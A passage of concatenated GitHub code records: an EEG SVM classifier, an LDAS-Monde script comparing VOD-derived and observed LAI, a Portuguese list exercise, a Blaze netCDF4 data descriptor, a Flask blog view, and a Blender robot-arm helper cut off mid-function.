'rbf')):\n\t\tcross_validation(x_train,y_train,x_test,y_test,kernel)\n\t\tsvclassifier = svm.SVC(kernel=kernel, gamma=10, class_weight=\"balanced\",decision_function_shape='ovo', degree=3)\n\t\n\t\tsvclassifier.fit(x_train, y_train)\n\t\t\n\t\ty_pred = svclassifier.predict(x_test)\n\t\t\n\t\tprint(confusion_matrix(y_test,y_pred))\n\t\tprint(classification_report(y_test, y_pred))\n\t\t# print(accuracy_score(y_test,y_pred))\n\t\t\n\t\n\n\n\n\n# Estandarización de datos con StandardScaler\ndef standarize_data(data):\n\tstandar_data = StandardScaler().fit_transform(data);\n\n\treturn standar_data;\n\ndef pca_implementation(x):\n\tpca = PCA(n_components=2)\n\tprincipalComponents = pca.fit_transform(x)\n\tprincipalDf = pd.DataFrame(data = principalComponents, columns =['Principal Component 1','Principal Component 2'])\n\tprincipalNumpy = np.array(principalDf);\n\n\treturn principalNumpy\n\n\n\n\n# Cargar archivos con el vector de caracteristicas de cada clase\nmemory_dataset = load_datasets('vector_ftt_abs_mean_memory.csv');\nrelax_dataset = load_datasets('vector_fft_abs_mean_relax.csv');\nrelax_music_dataset = load_datasets('vector_fft_abs_mean_relax_music.csv');\n\n\n# plt.title('Datos sin normalizar')\n# plt.xlabel('Time')\n# plt.ylabel('AF3')\n# plt.plot(range(0,256),memory_dataset[:256,1])\n# plt.show()\n\n# print(\"<<< Vector de características >>>\")\n# print(memory_dataset[0:5,:])\n\n# Estandariza los datos a una escala mas uniforme\nmemory_dataset = standarize_data(memory_dataset); \nrelax_dataset = standarize_data(relax_dataset);\nrelax_music_dataset = standarize_data(relax_music_dataset);\n\n\n# plt.title('Datos normalizados')\n# plt.xlabel('Time')\n# plt.ylabel('AF3')\n# plt.plot(range(0,256),memory_dataset[:256,1])\n# plt.show();\n\n# print(\"<<< Datos normalizados >>>\")\n# print(memory_dataset[0:5,:])\n\n# Implementación de PCA\n# memory_dataset = pca_implementation(memory_dataset); \n# relax_dataset = pca_implementation(relax_dataset);\n# relax_music_dataset = pca_implementation(relax_music_dataset);\n\n# print(memory_dataset.shape)\n\nmemory_dataset = np.insert(memory_dataset,5, 1, axis=1)\nrelax_dataset = np.insert(relax_dataset,5, 2, axis=1)\nrelax_music_dataset = np.insert(relax_music_dataset,5, 3, axis=1)\n\n# print(memory_dataset.shape)\n\n\n\neeg_dataset = np.concatenate((memory_dataset,relax_dataset,relax_music_dataset));\n\n\n# print(eeg_dataset[0:10,:])\n\n\n# Ploting the results of corss_validation\nprint(\"+++++==MEMORIA-RELAJACION-RELAJACION_MEMORIA==++++\")\nSVM(eeg_dataset)\n\n","repo_name":"Charly1704/tesis-eeg-implementation","sub_path":"Scripts/SVM/svm_implementation.py","file_name":"svm_implementation.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3042272501","text":"import sys, glob, os, re, math, time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport pandas as pd\nimport pylab as pl\nimport scipy.optimize as optim\nfrom netCDF4 import Dataset\nfrom mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid\nfrom math import radians, cos, sin, asin, sqrt\nfrom scipy.stats.stats import pearsonr\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\npl.ioff()\npl.rc('mathtext',default='regular') # use normal font for math expressions in rendered text\nMONTH_SHORT_NAMES = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')\n# Dictionary mapping observation names to model output names\nOBS_MOD = {'FAPAR':'FAPAR', 'FAPAR_V1':'DFAPARC', 'FAPAR_V2':'FAPAR', 'FAPAR300':'FAPAR',\n 'LAI':'LAI', 'LAI_V1':'LAI', 'LAI_V2':'LAI', 'LAI300':'LAI',\n 'LST':'TS', 'LST-6':'TS', 'LST-12':'TS',\n 'SA':'TALB','raw_SWI_nc':'WG2','raw_SWI':'WG2',\n 'SA':'TALB',\n 'SWI':'WG2', 'SWI_nc':'WG2', 'SSM':'WG2', 'SSM_COMBINED_v4':'WG2', 'SSM_COMBINED_v4.5':'WG2', 'SSM_ACTIVE_v4':'WG2', 'SSM_PASSIVE_v4':'WG2',\n 'SIF':'GPP', 'SIF-L3':'GPP', 'SIF-F':'GPP', 'FLCGPP':'GPPC',\n 'SIF-L3_V27':'GPPC','SIF-L3_V27_d':'GPPC','SIF-L3_V27_p':'GPPC',\n 'E_ACTUAL':'EVAPC', 'E_t':'LETRC', 'E_b':'LEGC', 'E_i':'LERC', 'FLLE':'EVAPC', 'FLGPP':'GPPC',\n 'SM_QD':'WG2', 'SM_QD_2540':'WG2', 'SM_QD_1030':'WG2','VODC':'LAI','VODX':'LAI','VODKu':'LAI',\n 'VOD_QD_1030':'LAI', 'VOD_QD_2540':'LAI', 'VOD_L_ASC':'LAI','SIGMA_40_QD':'LAI','IMS':'PSNG','NCALDAS':'EVAPC','FLDAS':'EVAPC','NCALDAS_LAI':'EVAPC','SCFV-MODIS':'PSNG',\n 'ET_04':'EVAPC','ET_05':'EVAPC'}\n #'VOD_QD_1030':'GPPC', 'VOD_QD_2540':'GPPC', 'VOD_L_ASC':'GPPC','SIGMA_40_QD':'LAI'}\nOBS_MOD_sameUnit = {'FAPAR':True, 'FAPAR_V1':True, 'FAPAR_V2':True, 'FAPAR300':True,\n 'LAI':True, 'LAI_V1':True, 'LAI_V2':True, 'LAI300':True,\n 'LST':True, 'LST-6':True, 'LST-12':True,\n 'SA':True,'VODC': False,'VODX': False,'VODKu': False,\n 'VOD_QD_1030': False, 'VOD_QD_2540':False, 'VOD_L_ASC':False,\n 'SWI':True, 'SWI_nc':True,'SSM':True, 'SSM_COMBINED_v4':True, 'SSM_COMBINED_v4.5':True, 'SSM_ACTIVE_v4':True, 'SSM_PASSIVE_v4':True,\n 'SM_QD':True,'SM_QD_2540':True,'SM_QD_1030':True,'SIGMA_40_QD':False,\n 'SIF':False, 'SIF-L3':False, 'SIF-F':False, 'FLCGPP':True,\n 'SIF-L3_V27':False,'SIF-L3_V27_d':False,'SIF-L3_V27_p':False,\n 'E_ACTUAL':True, 'E_t':True, 'E_b':True, 'E_i':True, 'FLLE':True, 'FLGPP':True,\n 'ET_04':True, 'ET_05':True}\n\n\nnumbers = re.compile(r'(\\d+)')\ndef numericalSort(value):\n parts = numbers.split(value)\n\n return parts\n\ndef check_post_zones(post_zones):\n '''\n Function used to check and format the post_zones dict.\n '''\n tmp_zones = dict()\n for zname,zone in post_zones.items():\n if zname=='def':\n tmp_zones['model zone'] = None\n elif zname=='point':\n for i,xy in zip(range(len(zone)),zone):\n pnt = 'pnt_{:02d}'.format(i+1)\n tmp_zones[pnt] = [[xy[0],xy[1]],[xy[0],xy[1]]]\n elif isinstance(zone,str): # If a netcdf file is given\n if not os.path.isfile(zone):\n raise Exception('\\nNetcdf file given for mask does not exist: {0}'.format(zone))\n with Dataset(zone) as nc:\n if zname=='all':\n for name in nc.variables['Name']: tmp_zones[name] = zone\n elif zname not in nc.variables['Name']:\n raise Exception('Mask name {0} not in {1}'.format(zname,zone))\n else: tmp_zones[zname] = zone\n else:\n tmp_zones[zname] = zone\n return tmp_zones\n\ndef prepareZone(zname,zone,map_set,graphics_dir):\n '''\n Prepares variables for the selected zone\n '''\n if zname=='model zone': # By default, zone = model grid\n map_set.zone = None\n graphics_dir_zone = graphics_dir\n IPNT = None\n else:\n graphics_dir_zone = graphics_dir+zname+'/'\n if isinstance(zone,str): # If a netcdf file is given\n nc = Dataset(zone)\n zone_id = nc.variables['Id'][pl.argwhere(nc.variables['Name'][:]==zname)[0][0]]\n IPNT = pl.where(nc.variables['Mask'][::-1,:]==zone_id,True,False).ravel()\n map_set.zone = [[min(map_set.X.ravel()[IPNT]),max(map_set.Y.ravel()[IPNT])],\n [max(map_set.X.ravel()[IPNT]),min(map_set.Y.ravel()[IPNT])]]\n nc.close()\n else: # If zone is a rectangular area [[lon_min,lat_max],[lon_max,lat_min]]\n map_set.zone = zone\n IPNT = pl.logical_and(map_set.mod_lon.ravel()>=zone[0][0],map_set.mod_lon.ravel()<=zone[1][0])\n IPNT = pl.logical_and(IPNT,\\\n pl.logical_and(map_set.mod_lat.ravel()<=zone[0][1],map_set.mod_lat.ravel()>=zone[1][1]))\n if map_set.mod_grid_type!='uniform': IPNT = IPNT[map_set.remap]\n # Directories for the selected zone\n graphics_dir_zone = graphics_dir_zone.replace(' ','_')\n makeDirIfNeeded(graphics_dir_zone)\n return map_set,graphics_dir_zone,IPNT\n\nfrom ldasModule import *\nfrom ldasMapSet import mapSet, uniformTicks, Basemap, Figure\n\n\ndef postObs(obs, data=None, minim=None, maxim=None):\n importLocals(currentframe())\n print('===================================================')\n print('Post-processing for observation: {0}'.format(obs)+(', model variable: {1}'.format(obs, OBS_MOD[obs]) if obs in OBS_MOD.keys() else ''))\n # Read all data\n if data is None:\n data = readAllData(obs, analysis_period, assim_hour, patch_frac, out_all_dir, \\\n post_from_pickle, mod_ana_dir, ['Model','Analysis','Obs'], \\\n IPNT=IPNT, map_set=map_set, filter_nan=not('SIF' in obs or 'E_ACTUAL' in obs or 'FLGPP' in obs))\n if 0 in data.shape:\n print('No dataset or no time step or no point. Continuing with next obs...')\n return\n items = data.coords['name'].values\n col_labels = [modexp_names[n] if n in modexp_names.keys() else n for n in items]\n if 'Analysis' in data.coords['name'].values and 'Model' in data.coords['name'].values:\n col_labels.append(col_labels[pl.find(items=='Analysis')[0]]+'-'+col_labels[pl.find(items=='Model')[0]])\n for time_window,t in zip(list_time_windows,range(len(list_time_windows))):\n if any([var_spatial_maps_out[t],var_time_series_out[t]]):\n print('Time window applied for {0}: {1}'.format(obs, time_window))\n # Apply time window\n data_tw = applyTimeWindow(data, time_window)\n # Additional diagnostis: analysis-model\n items_tw = data_tw.coords['name'].values\n if 'Analysis' in items_tw and 'Model' in items_tw:\n diff = data_tw.sel(name='Analysis')-data_tw.sel(name='Model')\n diff.values[diff.values==0] = np.nan\n diff = diff.assign_coords(name='Analysis-Model')\n diff = diff.expand_dims('name')\n data_tw = xr.concat([data_tw, diff], dim='name')\n #\n # Draw maps of variables: model, obs, analysis, diff(analysis-model)\n if minim is None and obs in CBAR_MINMAX: minim = CBAR_MINMAX[obs][0]\n if maxim is None and obs in CBAR_MINMAX: maxim = CBAR_MINMAX[obs][1]\n if var_spatial_maps_out[t]: draw_map_vars(map_set,obs,data_tw,graphics_dir=graphics_dir_zone,time_window=time_window,fig_dpi=fig_dpi,minim=minim,maxim=maxim,col_labels=col_labels)\n # Draw time series of variables (spatial average over the whole domain)\n if var_time_series_out[t]: draw_series_vars(data_tw.mean('point'), obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi, col_labels=col_labels)\n #\n # Compute statistics ('R','bias','std','rmse') and show\n if 'Obs' in items and any([stats_spatial_maps_out[t],stats_time_series_out[t],stats_table_out[t]]):\n # Draw maps of statistic scores: model vs obs, analysis vs obs, diff(analysis-model)\n if stats_spatial_maps_out[t]:\n if 'SIF' in obs or 'E_ACTUAL' in obs or 'FLGPP' in obs:\n scores_per_point = compute_scores_per_point(applyTimeWindow(data,'month'), time_window)\n else:\n scores_per_point = compute_scores_per_point(data, time_window)\n draw_map_stats(map_set, scores_per_point, graphics_dir=graphics_dir_zone, obs_var=obs, time_window=time_window, fig_dpi=fig_dpi, col_labels=col_labels)\n # Draw timeseries of statistic scores (spatial average over the whole domain)\n if 'SIF' in obs: scores_for_all_points = compute_scores_for_all_points(applyTimeWindow(data,'month'), time_window)\n ### Here, I compute both scores_per_point, and scores for all points at the same time - Take out if not needed, as this slows the process\n else : scores_for_all_points = compute_scores_for_all_points(data, time_window); scores_per_point = compute_scores_per_point(data, time_window)\n if stats_time_series_out[t]: draw_series_stats(scores_for_all_points, obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi, col_labels=col_labels)\n if stats_table_out[t]: drawScoresTable(scores_for_all_points, obs=obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi)\n #if stats_table_out[t]: drawScoresTable(scores_per_point.mean(axis=3), obs=obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi)\n #pdb.set_trace()\n\n #scores_for_all_points.to_netcdf('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/CustomPostProcessing/Data/US00/ldasPostScores/V3/{0}_{1}_{2}_scores_for_all_points.nc'.format(zname,obs,fname))\n #scores_per_point.to_netcdf('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/CustomPostProcessing/Data/US00/ldasPostScores/V3/{0}_{1}_{2}_scores_per_point.nc'.format(zname,obs,fname))\n\n #return scores_for_all_points\n #return scores_per_point\n\n\n\noptions_file = '/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/options_US00.py'\n\n#initPost(options_file)\nif options_file is not None:\n local_vars = dict()\n #try: execfile(options_file,local_vars)\n try: exec(open(options_file).read(),local_vars)\n except: raise Exception('\\nError in the options file!')\nelse:\n local_vars = currentframe(1).f_globals\n# Update local variables and check options\n#for key,value in local_vars.iteritems(): exec(key+\"=value\")\nfor key,value in local_vars.items(): exec(key+\"=value\")\ncheckOptions(locals(),options_file)\n#\nprint('\\nInitializing LDAS post-processing ({0} - {1}).\\n'.format(analysis_period[0],analysis_period[1]))\n#\n# Make initializations\n# If LST is in the obs list, then LST is analyzed at 6am and 12pm\nif 'LST' in obs_names:\n id_LST = obs_names.index('LST')\n del to_assim[id_LST]\n del rescale_calibs[id_LST]\n del rescale_calib_periods[id_LST]\n obs_names = filter(lambda x: x != 'LST',obs_names) + ['LST-6', 'LST-12']\n to_assim = to_assim + [False, False]\n rescale_calibs = rescale_calibs + [None,None]\n rescale_calib_periods = rescale_calib_periods+[[],[]]\n#\n# Main parameters definition\nout_all_dir = {'Obs': out_obs_dir, 'Model': out_mod_dir, 'Analysis': out_ana_dir}\npost_from_pickle = {'Obs': post_obs_from_pickle, 'rawObs': post_obs_from_pickle, \\\n 'Model': post_mod_from_pickle, 'Analysis': post_ana_from_pickle}\nobs_assim = [obs_names[i] for i in range(len(obs_names)) if to_assim[i]==True ]\nobs_NOassim = [obs_names[i] for i in range(len(obs_names)) if to_assim[i]==False]\nobs_assim_rescaled = [obs_names[i] for i in range(len(obs_names)) if to_assim[i] and rescale_calibs[i]]\npatch_frac = getModelPatchFractions(mod_pgd_path)\nmod_grid,trip_grid = parseOptionsNam(options_path)\nmod_ana_dir = {'Model': openloop_dir, 'Analysis': analysis_dir}\nif modexp_names=='def': modexp_names = {'Model':'Model', 'Analysis':'Analysis'}\nelse: modexp_names = {'Model':modexp_names[0], 'Analysis':modexp_names[1]}\npatch_post = pl.array(patch_out)-1\n#\n# Create instance of mapSet\nmap_set = mapSet(mod_grid,pgd=mod_pgd_path)\nif len(trip_vars)>0:\n map_set_trip = mapSet(trip_grid)\n#local_\n# Check for netcdf files given as mask\npost_zones = check_post_zones(post_zones)\n#\n# Initialize loop over zones\n#zname,zone = post_zones.items().next()\nzname,zone = next(iter(post_zones.items()))\nmap_set,graphics_dir_zone,IPNT = prepareZone(zname,zone,map_set,graphics_dir)\n#\n# Update caller local variables\n#local_vars = currentframe(1).f_globals\nlocal_vars = currentframe().f_globals\nfor key,value in locals().items(): local_vars[key] = value\n\ndef get_zone_grid(mod_grid, zone):\n zone_grid = dict()\n zone_grid['type'] = mod_grid['type']\n zone_grid['res'] = mod_grid['res']\n zone_grid['zone'] = zone\n\n return zone_grid\n\n### Chop up Zones\nif zone is not None:\n map_set = mapSet(mod_grid, pgd=mod_pgd_path)\n map_set,graphics_dir_zone,IPNT = prepareZone(zname,zone,map_set,graphics_dir)\n\n zone_grid = get_zone_grid(mod_grid, zone)\n map_set = mapSet(zone_grid, pgd=mod_pgd_path)\n map_set,graphics_dir_zone,_ = prepareZone(zname,zone,map_set,graphics_dir)\nelse:\n map_set,graphics_dir_zone,IPNT = prepareZone(zname,zone,map_set,graphics_dir)\n\n\n\n### Load Data\nvod = pd.read_pickle('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/US00/LAIfromVODCAX_V8_2003-2018.PData')\nvodx_int = pd.read_pickle('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/US00/LAIfromVODCAX_V7_2003-2018_interpolated.PData')\nfile = sorted(glob.glob('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/US00/observations/sfx-trip/LAI_V2*.PData'),key=numericalSort)\ndf = [pd.read_pickle(file[3]),pd.read_pickle(file[4]),pd.read_pickle(file[5]),pd.read_pickle(file[6]),pd.read_pickle(file[7]),pd.read_pickle(file[8]),pd.read_pickle(file[9]),pd.read_pickle(file[10]),pd.read_pickle(file[11]),pd.read_pickle(file[12]),pd.read_pickle(file[13]),pd.read_pickle(file[14]),pd.read_pickle(file[15]),pd.read_pickle(file[16]),pd.read_pickle(file[17]),pd.read_pickle(file[18])]\nobs = pd.concat(df)\n\ndate = pd.date_range(start=\"2003-01-01 09:00:00\",end='2018-12-31 09:00:00',freq='D')\nobs = obs.reindex(date,fill_value=np.nan)\nlai_cgls = lai_cgls.interpolate(inplace=False,limit_area='inside')\n\n###################################################################\n### Data Processing \n### Only takes data from the same time as observations \n###################################################################\n\nvod[np.invert(~np.isnan(obs))]=np.nan\nobs[np.invert(~np.isnan(vod))]=np.nan\n\n\nvodx_r = vod.corrwith(obs,axis=0)\nvodx_int_r = vodx_int.corrwith(obs,axis=0)\n###################################################################\n### Graphing Function(s)\n###################################################################\n\nvodm = vod.mean(axis=1)\nobsm = obs.mean(axis=1)\nvodx_intm = vodx_int.mean(axis=1)\n\nvod2 = vodm['2012-01-01':'2012-12-31']\nobs2 = obsm['2012-01-01':'2012-12-31']\nvodx_int2 = vodx_intm['2012-01-01':'2012-12-31']\n\nplt.title('LAI and Matched LAI from VODX : 2003-2018')\n#plt.plot(obsm,color='black',label='CGLS LAI Obs',marker='.',markersize=12)\nplt.plot(obsm,color='black',label='CGLS LAI Obs')\nplt.plot(vodm,color='green',label='LAI from VODX')\nplt.plot(vodx_intm,color='red',label='LAI from VODX - Interpolated Obs')\n\nplt.legend()\nplt.show()\n\nplt.title('LAI and Matched LAI from VODX : 2012')\n#plt.plot(obs2,color='black',label='CGLS LAI Obs',marker='.',markersize=12)\nplt.plot(obs2,color='black',label='CGLS LAI Obs')\nplt.plot(vod2,color='green',label='LAI from VODX')\nplt.plot(vodx_int2,color='red',label='LAI from VODX - Interpolated Obs')\n\nplt.legend()\nplt.show()\n\n###################################################################\n### Mapping Function(s)\n###################################################################\n\ntmp = obs.copy()*np.nan\nt = tmp.mean(axis=0)\n\nfor i in range(len(t)):\n print(i)\n t.loc[i] = i\n\nv1 = t.values.reshape((280,140))\n\n#fig, axes = plt.subplots(1)\n\nmap = Basemap(llcrnrlon=-130, llcrnrlat=20, urcrnrlon=-60, urcrnrlat=55,lat_0=40,lon_0=-98,resolution='l')\n#map.shadedrelief()\n#cm = plt.cm.get_cmap('bwr_r')\nmap.drawcoastlines(1.5)\nmap.drawcountries(1.5)\nmap.drawmeridians(np.arange(-120,-60,10),labels=[0,0,0,1],linewidth=.5)\nmap.drawparallels(np.arange(25,55,5),labels=[1,0,0,0],linewidth=.5)\ncs1 = map.imshow(v1,interpolation='none')\n#cs1 = map.imshow(v1,cmap='RdYlGn')\n\n#cbar1 = map.colorbar(v1,location='bottom',pad=\"10%\")\n#cbar1.set_label(\"LAI [$m^2$/$m^2$]\")\n#tick_locator = ticker.MaxNLocator(nbins=4)\n#cbar1.locator = tick_locator\n#cbar1.update_ticks()\n\nplt.show()\n\n\n","repo_name":"amucia2/LDAS-Monde","sub_path":"US00_selectPoints_V2.py","file_name":"US00_selectPoints_V2.py","file_ext":"py","file_size_in_byte":16869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26881886550","text":"lista = []\r\ncont = 0\r\nwhile True:\r\n n = int(input('Digite um valor: '))\r\n cont += 1\r\n lista.append(n)\r\n r = str(input('Quer continuar [S/N] '))\r\n if r in 'nN':\r\n break\r\nlista.sort(reverse=True)\r\nprint('-=' * 30)\r\nprint(f'Você digitou {cont} elementos.')\r\nprint(f'Os valores em ordem decrescente são {lista}')\r\nif 5 in lista:\r\n print('O valor 5 faz parte da lista !')\r\nelse:\r\n print('O valor 5 não foi encontrado na lista!')","repo_name":"Ryotruuser/Python--Projetos","sub_path":"Exercicios/ex081.py","file_name":"ex081.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5828397110","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport numpy as np\nfrom dynd import nd\nimport datashape\n\nfrom . import DDesc, Capabilities\nfrom .dynd_data_descriptor import DyND_DDesc\nfrom .stream_data_descriptor import Stream_DDesc\nfrom ..optional_packages import netCDF4_is_here\nif netCDF4_is_here:\n import netCDF4\n\n\ndef get_node(f, dp):\n \"\"\"Get a node in `f` file/group with a `dp` datapath (can be nested).\"\"\"\n if dp.startswith('/'): dp = dp[1:]\n idx = dp.find('/')\n if idx >= 0:\n group = f.groups[dp[:idx]]\n return get_node(group, dp[idx+1:])\n return f.variables[dp]\n\nclass netCDF4_DDesc(DDesc):\n \"\"\"\n A Blaze data descriptor which exposes a netCDF4 dataset.\n \"\"\"\n\n def __init__(self, path, datapath, mode='r'):\n self.path = path\n self.datapath = datapath\n self.mode = mode\n\n @property\n def dshape(self):\n # This cannot be cached because the Array can change the dshape\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n odshape = datashape.from_numpy(dset.shape, dset.dtype)\n return odshape\n\n @property\n def capabilities(self):\n \"\"\"The capabilities for the netCDF4 arrays.\"\"\"\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n appendable = isinstance(dset, netCDF4.Variable)\n caps = Capabilities(\n # netCDF4 arrays can be updated\n immutable = False,\n # netCDF4 arrays are concrete\n deferred = False,\n # netCDF4 arrays are persistent\n persistent = True,\n # netCDF4 arrays can be appended efficiently\n appendable = appendable,\n # netCDF4 arrays cannot be queried efficiently\n queryable = False,\n remote = False,\n )\n return caps\n\n def dynd_arr(self):\n # Positionate at the beginning of the file\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n dset = nd.array(dset[:], dtype=dset.dtype)\n return dset\n\n def __array__(self):\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n dset = dset[:]\n return dset\n\n def __len__(self):\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n arrlen = len(dset)\n return arrlen\n\n def __getitem__(self, key):\n with netCDF4.Dataset(self.path, mode='r') as f:\n dset = get_node(f, self.datapath)\n # The returned arrays are temporary buffers,\n # so must be flagged as readonly.\n dyndarr = nd.asarray(dset[key], access='readonly')\n return DyND_DDesc(dyndarr)\n\n def __setitem__(self, key, value):\n # netCDF4 arrays can be updated\n with netCDF4.Dataset(self.path, mode=self.mode) as f:\n dset = get_node(f, self.datapath)\n dset[key] = value\n\n def __iter__(self):\n f = netCDF4.Dataset(self.path, mode='r')\n dset = get_node(f, self.datapath)\n # Get rid of the leading dimension on which we iterate\n dshape = datashape.from_numpy(dset.shape[1:], dset.dtype)\n for el in dset:\n if hasattr(el, \"nrow\"):\n yield DyND_DDesc(nd.array(el[:], type=str(dshape)))\n else:\n yield DyND_DDesc(nd.array(el, type=str(dshape)))\n f.close()\n\n def getattr(self, name):\n with netCDF4.Dataset(self.path, mode=self.mode) as f:\n dset = get_node(f, self.datapath)\n if hasattr(dset, 'cols'):\n return DyND_DDesc(\n nd.asarray(getattr(dset.cols, name)[:],\n access='readonly'))\n else:\n raise IndexError(\"not an netCDF4 compound dataset\")\n\n def append(self, values):\n \"\"\"Append a list of values.\"\"\"\n with netCDF4.Dataset(self.path, mode=self.mode) as f:\n dset = get_node(f, self.datapath)\n dset[len(dset):] = values\n\n def remove(self):\n \"\"\"Remove the persistent storage.\"\"\"\n os.unlink(self.path)\n","repo_name":"code-for-india/Delivery-Optimization","sub_path":"blaze/blaze/datadescriptor/netcdf4_data_descriptor.py","file_name":"netcdf4_data_descriptor.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36494117263","text":"from flask import render_template, abort\nfrom blueprints.models import BlogPost\nfrom blueprints.blog import blog\n\n\n@blog.route('/blog')\ndef view_blog():\n posts = BlogPost.query.all()\n posts.sort(key=lambda x: x.date, reverse=True)\n return render_template('blog.html', posts=posts)\n\n\n@blog.route('/blog/', methods=['GET'])\ndef view_blog_post(id):\n\n blog_post = BlogPost.query.get(id)\n if blog_post is not None:\n return render_template('blog_post.html', blog_post=blog_post)\n abort(404)\n","repo_name":"astepe/ari-blog","sub_path":"blueprints/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71162039161","text":"# import importlib\n# importlib.sys.modules['blender-robot-arm-simulator.DH_helper']\n\nimport bpy, math\nfrom mathutils import Vector, Euler\nfrom .common import output, isPreposing\nfrom math import radians\n\n\ndef initGP(context):\n S = context.scene\n # Create grease pencil data if none exists\n if not S.grease_pencil:\n a = [a for a in bpy.context.screen.areas if a.type == 'VIEW_3D'][0]\n override = {\n 'scene': S,\n 'screen': bpy.context.screen,\n 'object': bpy.context.object,\n 'area': a,\n 'region': a.regions[0],\n 'window': bpy.context.window,\n 'active_object': bpy.context.object\n }\n\n bpy.ops.gpencil.data_add(override)\n\n return S.grease_pencil\n\n\ndef gpLayerFrame(context):\n\n gp = initGP(context)\n\n # 创建画 H-D 辅助线的图层\n if not gp.layers or not gp.layers[\"H-D\"]:\n gpl = gp.layers.new('H-D', set_active=True)\n else:\n gpl = gp.layers['H-D']\n\n # Reference active GP frame or create one of none exists\n if gpl.frames:\n fr = gpl.active_frame\n else:\n fr = gpl.frames.new(1)\n\n return fr\n\n\ndef gpColor(context, name):\n gp = initGP(context)\n\n if \"joint-help-line\" in gp.palettes:\n palette = gp.palettes.get(\"joint-help-line\")\n else:\n palette = gp.palettes.new(\"joint-help-line\")\n\n if name in palette.colors :\n color = palette.colors.get(name)\n else:\n color = palette.colors.new()\n color.color = Vector([0.8815780282020569, 0.20415417850017548, 0.32798585295677185])\n color.name = name\n\n return color\n\n\ndef line(endpoint1, endpoint2, colorname=\"default\") :\n\n if endpoint1==None or endpoint2==None:\n return\n\n fr = gpLayerFrame(bpy.context)\n\n # Create a new stroke\n str = fr.strokes.new(colorname=colorname)\n str.draw_mode = '3DSPACE'\n\n # Add points\n str.points.add(count = 2 )\n str.points[0].co = (endpoint1)\n str.points[1].co = (endpoint2)\n\n return str\n\n\ndef clearGuide():\n fr = gpLayerFrame(bpy.context)\n if fr==None :\n return\n for str in fr.strokes.values() :\n fr.strokes.remove(str)\n\n# 各个关节的坐标系\n# 坐标系 i 对应关节 i+1\n# -1 对应世界坐标系\njoints_cosys = {\n -1: { \"O\": Vector((0,0,0)), \"z-unit\": Vector((0,0,50)), \"x-unit\": Vector((50,0,0)), \"y-unit\": None, \"H\": None } ,\n 0: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 1: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 2: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 3: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 4: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 5: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n 6: { \"O\": None, \"z-unit\": None, \"x-unit\": None, \"y-unit\": None, \"H\": None } ,\n}\n\n\ndef normalize(v):\n v.normalize()\n return v\n\n# 计算两直线的公垂线\n# 算法参考 《3D数学基础》P268\n# r1(t1) 为 zn上的垂足\n# r2(t2) 为 zpre 上的垂足\n# 如果两条直线相交,r1和r2实际为同一点,公垂线长度为0,v则提供了其方向\ndef commonPerpendicular(p1, d1, p2, d2) :\n\n v = d1.cross(d2)\n\n # d1 x d2 的长度为0(受float精度的影响接近0),表示前后两个关节的 z轴平行 或 重叠\n # 该情况下,不存在公垂线\n if v.magnitude<0.002 :\n return (None, None, None)\n\n magnitude2 = v.magnitude * v.magnitude\n\n tn = (p2 - p1).cross(d2).dot(v) / magnitude2\n tpre = (p2 - p1).cross(d1).dot(v) / magnitude2\n\n # 带入射线函数,求出 r1 和 r2\n r1 = p1 + tn * d1\n r2 = p2 + tpre * d2\n\n return (r1, r2, v)\n\n# 计算两向量的夹角\ndef linesAngle(d1, d2, axes=None) :\n\n acos_value = d1.dot(d2)/(d1.magnitude*d2.magnitude)\n # 由于精度问题, 容易出现 1.0000000000000003 这样的数值\n if acos_value>1 :\n acos_value = 1.0\n if acos_value<-1 :\n acos_value = -1.0\n degree = math.acos( acos_value ) / math.pi * 180.0\n\n if degree<0.01 :\n degree = 0\n\n # 两向量叉乘的结果,和传入的axes方向相同,\n # 则 d1 到 d2 的为顺时针,返回正值\n # 否则为逆时针,返回负值\n if axes!=None :\n if d1.cross(d2).dot(axes)<0 :\n degree = -degree\n\n return degree\n\n# 计算向量 v 到 n 的投影\ndef projection(v, 